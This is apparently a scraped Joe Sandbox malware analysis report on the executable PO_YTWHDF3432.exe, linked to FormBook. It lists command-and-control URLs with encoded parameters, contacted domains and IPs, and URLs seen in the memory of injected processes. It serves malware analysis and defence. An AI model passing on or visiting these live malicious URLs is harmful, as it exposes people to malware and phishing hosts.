            http://www.domainappraisalbot.com/ahec/100%Avira URL Cloudmalware
            http://www.jones4deepriver.com/ahec/100%Avira URL Cloudmalware
            http://www.nesmalt.info/ahec/?Ot=DTrGbTEHMG6Y4mKy1Dn1KlGSTxAaPAt5CR5S23I4xf5AWU1NMecScwq/Pr/mUgt4GFrPBjE4MJyXMuu59XRudeX+UPGmLlgOAA==&6d=QlZl100%Avira URL Cloudmalware
            http://www.alldaysslimmingstea.com/ahec/?Ot=0lWeLq0ljZnDSWqKPiItN+dDtGaop8tJSpt/SUCn4seLkPj1kpVBncTOO8qbY1skp8kxUg4twvHodh//BlyQvVj0G3LunRoJLQ==&6d=QlZl100%Avira URL Cloudmalware
            http://www.altralogos.com/ahec/100%Avira URL Cloudmalware
            http://www.instantconvey.com/ahec/100%Avira URL Cloudmalware
            http://www.611erhm.top/ahec/100%Avira URL Cloudphishing
            http://www.altralogos.com/ahec/?Ot=3lo42cEGi68x7KhRgTNiezz9KQRWhNcycY0hNiK/Qn4Z+z7fEU9kkqncAr7zuQTFBqkfWFiGtk2IJlit7AKsEfLNF+7YeihFeQ==&6d=QlZl100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.makeinai.online
            		37.140.192.89
            		truefalseunknown
            www.nesmalt.info
            		66.29.155.54
            		truefalseunknown
            www.611erhm.top
            		34.149.198.43
            		truefalseunknown
            fam-scharf.net
            		81.169.145.70
            		truefalseunknown
            instantconvey.com
            		131.153.147.90
            		truefalseunknown
            natroredirect.natrocdn.com
            		85.159.66.93
            		truefalseunknown
            altralogos.com
            		185.74.252.11
            		truefalseunknown
            alldaysslimmingstea.com
            		162.222.226.77
            		truefalseunknown
            wrautomotive.online
            		37.97.254.27
            		truefalseunknown
            www.jones4deepriver.com
            		74.208.236.181
            		truefalseunknown
            www.domainappraisalbot.com
            		94.23.162.163
            		truefalseunknown
            thecoloringbitch.com
            		162.241.252.161
            		truefalseunknown
            www.poria.link
            		172.67.184.73
            		truefalseunknown
            www.77moea.top
            		107.178.250.177
            		truefalseunknown
            www.magmadokum.com
            		unknown
            		unknowntrueunknown
            www.altralogos.com
            		unknown
            		unknowntrueunknown
            www.wrautomotive.online
            		unknown
            		unknowntrueunknown
            www.instantconvey.com
            		unknown
            		unknowntrue
              		unknown
              www.thecoloringbitch.com
              		unknown
              		unknowntrueunknown
              www.alldaysslimmingstea.com
              		unknown
              		unknowntrueunknown
              www.fam-scharf.net
              		unknown
              		unknowntrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.instantconvey.com/ahec/?Ot=SEtDmKR01RO/v1cj8toEclhnh+z+cFCFQ+LqZaILuKhM8xDFx1nbKCOFshx5Sqoz6Az3phyVzpkjs7F2QS7dClcm7p6TyxSZVg==&6d=QlZltrue
              • Avira URL Cloud: malware
              		unknown
              http://www.makeinai.online/ahec/?Ot=MydpLo7WWyKQN3KSEM/46nakICary48nbscI2lMT8W/M5j1pmQABg8QwQndiOgkeUarM8fNOhSJ3XzKDSkOhi0CLYcLsXbR3hQ==&6d=QlZltrue
              • Avira URL Cloud: malware
              		unknown
              http://www.jones4deepriver.com/ahec/?Ot=9k2v98v8fW7x5mtxcj8a5QMRCoEP1Px6NgJCH+u8B3tf6gDcFaFwcfLjsp7tbCeN6M+Gl5HR8oN4IorBb0piTBAHvy1fUTc2Bw==&6d=QlZltrue
              • Avira URL Cloud: malware
              		unknown
              http://www.magmadokum.com/ahec/?Ot=AHFK2pjoxw5zzLKjgIeieoxyeFKGBXiFIXzrT8sRZEqLGYv6y8nhVjDsidhHFHxwb+HDFiGiPRNZnrHWQBMiJvor1pzBMUzxhg==&6d=QlZlfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.611erhm.top/ahec/?Ot=UYUxSke5jkUMcYDKg5c5qeCNAmjygCX5uaIG43dC5thZqMprvLUeD5Feo3aTVHSupyfrGHzleQTbxGW3puedJJnHNv+xYZWaEw==&6d=QlZltrue
              • Avira URL Cloud: phishing
              		unknown
              http://www.poria.link/ahec/false
              • 3%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              http://www.nesmalt.info/ahec/false
              • Avira URL Cloud: malware
              		unknown
              http://www.magmadokum.com/ahec/false
              • Avira URL Cloud: safe
              		unknown
              http://www.fam-scharf.net/ahec/false
              • Avira URL Cloud: malware
              		unknown
              http://www.77moea.top/ahec/false
              • Avira URL Cloud: phishing
              		unknown
              http://www.domainappraisalbot.com/ahec/?Ot=bB5JTYLqXbmN0Rh+5NINP+PQjDS0UbZCl3xm8ZfdPOYVrj3MpZEcwx/57KsfYAKqEjFN/H+DNeQWefm4mYcz+JoJDCs0w/OhmA==&6d=QlZlfalse
              • Avira URL Cloud: malware
              		unknown
              http://www.makeinai.online/ahec/false
              • Avira URL Cloud: malware
              		unknown
              http://www.thecoloringbitch.com/ahec/false
              • Avira URL Cloud: malware
              		unknown
              http://www.thecoloringbitch.com/ahec/?Ot=nB1qtJANgieev8TNIXcafe3NbPYBnXyCXRyPWsB/WMzSWoyZdSlu5bXncPzzIIBEZ/2nP35zxbYs3CtalsMWA7WUc9X1BQW9lg==&6d=QlZlfalse
              • Avira URL Cloud: malware
              		unknown
              http://www.poria.link/ahec/?Ot=IVKkGpXtV1toVTOE4YlrK/DLoA9BOULGifHJVqVOgN7K+V/6a9WE/CA4RHgfE4yJ8GdRU2XQNCMfR2HSu9NM5VP3fUQbd2z87Q==&6d=QlZlfalse
              • Avira URL Cloud: malware
              		unknown
              http://www.77moea.top/ahec/?Ot=W415zxONlMY0LROALmBwVywFRuOF9MDUrzPBSWER7JgIGEVSpL5hn1DTAqCrj0fiYOesE/vl81lAGPaeX7agy8WUnV35Ak22aw==&6d=QlZlfalse
              • Avira URL Cloud: phishing
              		unknown
              http://www.wrautomotive.online/ahec/false
              • Avira URL Cloud: safe
              		unknown
              http://www.fam-scharf.net/ahec/?Ot=pHT1kOem2IT0Y9TOyYUVH8n+JKlTpsv3XSVhoxxlik7UiuURsLT/Jzy3sp/tZoydu20sa6TfNH7nZl1KjnhVFUdGE6T0LcUEcA==&6d=QlZlfalse
              • Avira URL Cloud: malware
              		unknown
              http://www.domainappraisalbot.com/ahec/false
              • Avira URL Cloud: malware
              		unknown
              http://www.jones4deepriver.com/ahec/false
              • Avira URL Cloud: malware
              		unknown
              http://www.nesmalt.info/ahec/?Ot=DTrGbTEHMG6Y4mKy1Dn1KlGSTxAaPAt5CR5S23I4xf5AWU1NMecScwq/Pr/mUgt4GFrPBjE4MJyXMuu59XRudeX+UPGmLlgOAA==&6d=QlZlfalse
              • Avira URL Cloud: malware
              		unknown
              http://www.alldaysslimmingstea.com/ahec/?Ot=0lWeLq0ljZnDSWqKPiItN+dDtGaop8tJSpt/SUCn4seLkPj1kpVBncTOO8qbY1skp8kxUg4twvHodh//BlyQvVj0G3LunRoJLQ==&6d=QlZlfalse
              • Avira URL Cloud: malware
              		unknown
              http://www.altralogos.com/ahec/false
              • Avira URL Cloud: malware
              		unknown
              http://www.instantconvey.com/ahec/false
              • Avira URL Cloud: malware
              		unknown
              http://www.611erhm.top/ahec/false
              • Avira URL Cloud: phishing
              		unknown
              http://www.altralogos.com/ahec/?Ot=3lo42cEGi68x7KhRgTNiezz9KQRWhNcycY0hNiK/Qn4Z+z7fEU9kkqncAr7zuQTFBqkfWFiGtk2IJlit7AKsEfLNF+7YeihFeQ==&6d=QlZlfalse
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://duckduckgo.com/chrome_newtabisoburn.exe, 0000000B.00000003.1540520793.0000000007E18000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.jsisoburn.exe, 0000000B.00000002.3734102221.0000000006DCE000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3735982398.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3734102221.00000000065F4000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.0000000003E34000.00000004.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.000000000460E000.00000004.00000001.00040000.00000000.sdmpfalse
                  		high
                  https://duckduckgo.com/ac/?q=isoburn.exe, 0000000B.00000003.1540520793.0000000007E18000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.jsisoburn.exe, 0000000B.00000002.3734102221.0000000006DCE000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3735982398.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3734102221.00000000065F4000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.0000000003E34000.00000004.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.000000000460E000.00000004.00000001.00040000.00000000.sdmpfalse
                      		high
                      https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000003.1594930658.0000000008540000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://track.uc.cn/collectisoburn.exe, 0000000B.00000002.3734102221.0000000006DCE000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3735982398.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3734102221.00000000065F4000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.0000000003E34000.00000004.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.000000000460E000.00000004.00000001.00040000.00000000.sdmpfalse
                          		high
                          http://altralogos.com/ahec/?Ot=3lo42cEGi68x7KhRgTNiezz9KQRWhNcycY0hNiK/Qn4Zisoburn.exe, 0000000B.00000002.3734102221.0000000006C3C000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.000000000447C000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=isoburn.exe, 0000000B.00000003.1540520793.0000000007E18000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://files.reg.ru/fonts/inter/Inter-SemiBold.woff2)isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpfalse
                              		high
                              https://files.reg.ru/fonts/inter/Inter-Regular.woff)isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                		high
                                https://hm.baidu.com/hm.js?isoburn.exe, 0000000B.00000002.3734102221.0000000006DCE000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3735982398.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3734102221.00000000065F4000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.0000000003E34000.00000004.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.000000000460E000.00000004.00000001.00040000.00000000.sdmpfalse
                                  		high
                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchisoburn.exe, 0000000B.00000003.1540520793.0000000007E18000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.jsisoburn.exe, 0000000B.00000002.3734102221.0000000006DCE000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3735982398.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3734102221.00000000065F4000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.0000000003E34000.00000004.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.000000000460E000.00000004.00000001.00040000.00000000.sdmpfalse
                                      		high
                                      https://www.reg.ru/service/prolong_period_anonymous?servtype=srv_hosting_ispmgr&amp;dname_or_ip=isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                        		high
                                        https://pdds.quark.cn/download/stfile/rrxtuszryrsvrtzte/QuarkCloudDrive-v2.5.43-release-pckkisoburn.exe, 0000000B.00000002.3734102221.0000000006DCE000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3735982398.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3734102221.00000000065F4000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.0000000003E34000.00000004.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.000000000460E000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://cdn.jsinit.directfwd.com/sk-jspark_init.phpisoburn.exe, 0000000B.00000002.3734102221.0000000005AF6000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.0000000003336000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1595035240.000000000A126000.00000004.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://mozilla.org0/isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://crash-reports.mozilla.com/submit?id=isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000003.1594930658.0000000008540000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoisoburn.exe, 0000000B.00000003.1540520793.0000000007E18000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://files.reg.ru/fonts/inter/Inter-Medium.woff2)isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                              		high
                                              https://2domains.ruisoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=isoburn.exe, 0000000B.00000003.1540520793.0000000007E18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://files.reg.ru/fonts/inter/Inter-SemiBold.woff)isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    		high
                                                    https://www.ecosia.org/newtab/isoburn.exe, 0000000B.00000003.1540520793.0000000007E18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.reg.ru/hosting/isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        		high
                                                        http://www.wrautomotive.onlineqNENczArVjafOgvC.exe, 0000000D.00000002.3732252302.0000000002CCD000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://ac.ecosia.org/autocomplete?q=isoburn.exe, 0000000B.00000003.1540520793.0000000007E18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://files.reg.ru/fonts/inter/Inter-Medium.woff)isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            		high
                                                            https://www.reg.ru/hostingqNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              		high
                                                              https://files.reg.ru/fonts/inter/Inter-Regular.woff2)isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                		high
                                                                https://image.uc.cn/s/uae/g/3o/berg/static/index.442d968fe56a55df4c76.cssisoburn.exe, 0000000B.00000002.3734102221.0000000006DCE000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3735982398.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3734102221.00000000065F4000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.0000000003E34000.00000004.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.000000000460E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=isoburn.exe, 0000000B.00000003.1540520793.0000000007E18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.369a663b08a55d305b97.jsisoburn.exe, 0000000B.00000002.3734102221.0000000006DCE000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3735982398.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3734102221.00000000065F4000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.0000000003E34000.00000004.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.000000000460E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      https://reg.ru?target=_blankisoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        131.153.147.90
                                                                        		instantconvey.comUnited States
                                                                        		19437SS-ASHUSfalse
                                                                        37.97.254.27
                                                                        		wrautomotive.onlineNetherlands
                                                                        		20857TRANSIP-ASAmsterdamtheNetherlandsNLfalse
                                                                        162.241.252.161
                                                                        		thecoloringbitch.comUnited States
                                                                        		46606UNIFIEDLAYER-AS-1USfalse
                                                                        94.23.162.163
                                                                        		www.domainappraisalbot.comFrance
                                                                        		16276OVHFRfalse
                                                                        162.222.226.77
                                                                        		alldaysslimmingstea.comUnited States
                                                                        		394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                                        85.159.66.93
                                                                        		natroredirect.natrocdn.comTurkey
                                                                        		34619CIZGITRfalse
                                                                        185.74.252.11
                                                                        		altralogos.comLithuania
                                                                        		59939WIBO-ASLTfalse
                                                                        81.169.145.70
                                                                        		fam-scharf.netGermany
                                                                        		6724STRATOSTRATOAGDEfalse
                                                                        37.140.192.89
                                                                        		www.makeinai.onlineRussian Federation
                                                                        		197695AS-REGRUfalse
                                                                        74.208.236.181
                                                                        		www.jones4deepriver.comUnited States
                                                                        		8560ONEANDONE-ASBrauerstrasse48DEfalse
                                                                        34.149.198.43
                                                                        		www.611erhm.topUnited States
                                                                        		2686ATGS-MMD-ASUSfalse
                                                                        107.178.250.177
                                                                        		www.77moea.topUnited States
                                                                        		15169GOOGLEUSfalse
                                                                        66.29.155.54
                                                                        		www.nesmalt.infoUnited States
                                                                        		19538ADVANTAGECOMUSfalse
                                                                        172.67.184.73
                                                                        		www.poria.linkUnited States
                                                                        		13335CLOUDFLARENETUSfalse

                                                                        General Information

                                                                        Joe Sandbox Version:38.0.0 Ammolite
                                                                        Analysis ID:1352165
                                                                        Start date and time:2023-12-02 18:47:24 +01:00
                                                                        Joe Sandbox Product:CloudBasic
                                                                        Overall analysis duration:0h 11m 20s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:17
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:2
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample file name:PO_YTWHDF3432.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@7/2@15/14
                                                                        EGA Information:
                                                                        • Successful, ratio: 75%
                                                                        HCA Information:
                                                                        • Successful, ratio: 92%
                                                                        • Number of executed functions: 193
                                                                        • Number of non-executed functions: 275
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                        • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        18:48:15API Interceptor2x Sleep call for process: PO_YTWHDF3432.exe modified
                                                                        18:49:01API Interceptor10344578x Sleep call for process: isoburn.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        131.153.147.90PO_CCTEB77.exeGet hashmaliciousFormBookBrowse
                                                                        • www.instantconvey.com/ahec/?Vjk=-N-tntX&KHcH=SEtDmKR01RO/v1cj8toEclhnh+z+cFCFQ+LqZaILuKhM8xDFx1nbKCOFshx5Sqoz6Az3phyVzpkjs7F2QS7dClw6x6iQ2E33Xw==
                                                                        PO_VCFGA1010.exeGet hashmaliciousFormBookBrowse
                                                                        • www.instantconvey.com/ahec/?TrRXYB=SEtDmKR01RO/v1cj8toEclhnh+z+cFCFQ+LqZaILuKhM8xDFx1nbKCOFshx5Sqoz6Az3phyVzpkjs7F2QS7dFlwn16ST0xT3ScnWnfliYcAA&NRpHp=DLPh_Z
                                                                        37.97.254.27PO_CCTEB77.exeGet hashmaliciousFormBookBrowse
                                                                        • www.wrautomotive.online/ahec/?KHcH=5igDJT3zPYxoznSYBBpd18gTi2dx8KCRz+D9mmXj9CLVcvHmJGefSTTLw3ACEWBDJ4ZMU5QrLRnI3LOtkf+zzorQEnBYkPkOfg==&Vjk=-N-tntX
                                                                        Fpopgapwdcgvxn.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                        • www.kermisbedrijfkramer.online/ao65/?3f94p=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/Y+YwQBdR3MSzENA==&ojq4i=mFNh5n78I22D3DgP
                                                                        Product_Specs.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • www.wrautomotive.online/ur4g/?vxM0=G80Xg2gxjV&eh=GM1abjaFQeRWF1TbL/6IPq6IQ8Zq6L6A/eGtDh+rzhSfkUEKySbsXXOahwAFIXwkymySVlBBxGC7SDgkYy5RlvrvRaU4SsaPnA==
                                                                        PO_VCFGA1010.exeGet hashmaliciousFormBookBrowse
                                                                        • www.wrautomotive.online/ahec/?TrRXYB=5igDJT3zPYxoznSYBBpd18gTi2dx8KCRz+D9mmXj9CLVcvHmJGefSTTLw3ACEWBDJ4ZMU5QrLRnI3LOtkf+z0orNAnxbm6AOaCZvJNva1SPD&NRpHp=DLPh_Z
                                                                        25-23PJSM-653.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • www.rocsys.net/uaaq/?Zvo88=ZvgtLzuC5J0fwHYuRehKE7pqe+TegS3vAv4ZEylVZ8S9BUo4tJK/O+Yy7erX60uFZvklPnpu2szjI2ePXJ09nWZe2eIrY7ioDA==&5j=JXHP5xY8
                                                                        PAGAMENTO_INV-85732.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                        • www.qa-manny.com/cvps/?ojQxW=_LZhZtRhEB2XP&-Lkxp=YYStJbUf5TaZehAWHAdvcDwKkN8dqWyQyqo9RJP/Q7ViCmgow6wyh8/3RNpMerc2KWMLTTY6CI9NpXl7SvcbIbeUXgqX6DnaKg==
                                                                        file.exeGet hashmaliciousFormBookBrowse
                                                                        • www.wrautomotive.online/fdo5/?7F=tmpHADT4fdGVd6nnK8VfxTcjTEmAMjvmemW+C4Ol5iYH1IbYxa+keO9dRydEANAVQTW4GcRzv85KoC+8HtmJLO5vdlfv2fS0QQ==&zf7=WxIPUXb0
                                                                        Order_confirmation,_Invoice.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                        • www.kermisbedrijfkramer.online/ao65/?Urwl=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/Y+YwQBdR3MSzENA==&S0GhC=_R-phJeXT
                                                                        INV#761538.exeGet hashmaliciousFormBookBrowse
                                                                        • www.qa-manny.com/cvps/?kDuhz=t6NP562HYH_&pf5=YYStJbUf5TaZehAWHAdvcDwKkN8dqWyQyqo9RJP/Q7ViCmgow6wyh8/3RNpMerc2KWMLTTY6CI9NpXl7SvcbIbeUXgqX6DnaKg==
                                                                        137-AGROCHLOPECKI_OFFER_list.xlsGet hashmaliciousFormBookBrowse
                                                                        • www.rocsys.net/g81o/?t8F43Dx=Xpn7ovWGDL38rcQsVj9M+fSKcj+67g3pDTSuqHneUyb3n+qAvdqStutd5ioDJ87L1Kdi6p0jXbywk+j2nUztgIlZl1ilwP64qP32EII=&xphPK=azPpsjMX1
                                                                        NNL_PO_1023008.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • www.rocsys.net/uaaq/?w89D=LxmD0p&UX=ZvgtLzuC5J0fwHYxUOhDE7BocrPe2y3vAv4ZEylVZ8S9BUo4tJK/O+Yy7erX60uFZvklPnpu2szjI2ePXJ09mUhv++5catqsVQ==
                                                                        003425425124526.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                        • www.kermisbedrijfkramer.online/ao65/?GR0=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS1HIoJcoA9wm&IDK=RJBh5RS0IZO8zhrP
                                                                        Document.exeGet hashmaliciousFormBookBrowse
                                                                        • www.qa-manny.com/cvps/?Tb-PA8s8=YYStJbUf5TaZehAWHAdvcDwKkN8dqWyQyqo9RJP/Q7ViCmgow6wyh8/3RNpMerc2KWMLTTY6CI9NpXl7SvcbIbeUXgqX6DnaKg==&0H=BrFhG8npvv
                                                                        Hubnnuiisapctu.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                        • www.kermisbedrijfkramer.online/ao65/?2d=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/hhpQTPLNwMSzDew==&3fC=vZeTzRlX84SHE
                                                                        Invoice.exeGet hashmaliciousUnknownBrowse
                                                                        • www.wrautomotive.online/9hnx/?qjEABCG=x93wZY5flbcWgBQ+QBIan4Q/Fzujwl2X6zdiZc2Bln/4Iyn/0F+0HT2oZzLfP234arynxKxgoTzQXViUvY11cUD95//AJ74tDA==&KD=eYDR
                                                                        Factura_1-000816pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
